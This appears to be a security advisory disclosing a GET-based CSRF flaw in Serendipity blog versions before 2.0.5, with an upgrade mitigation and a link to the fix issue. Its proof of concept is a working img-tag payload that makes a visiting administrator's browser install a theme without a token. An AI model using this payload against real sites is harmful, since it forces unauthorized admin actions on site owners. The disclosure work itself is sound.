Details

======


Software: s9y Serendipity

Version: <2.0.5

Homepage: https://docs.s9y.org/


=======


Description

================

Get type CSRF in Serendipity allows attacker installs any themes, no token here.


POC:


========


include this in the page ,then attack will occur:


<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya>



Mitigations

=======


update to Serendipity v2.1.x


========


FIX:


==========


https://github.com/s9y/Serendipity/issues/452


Best regards,


Zhiyang Zeng of Tencent security platform department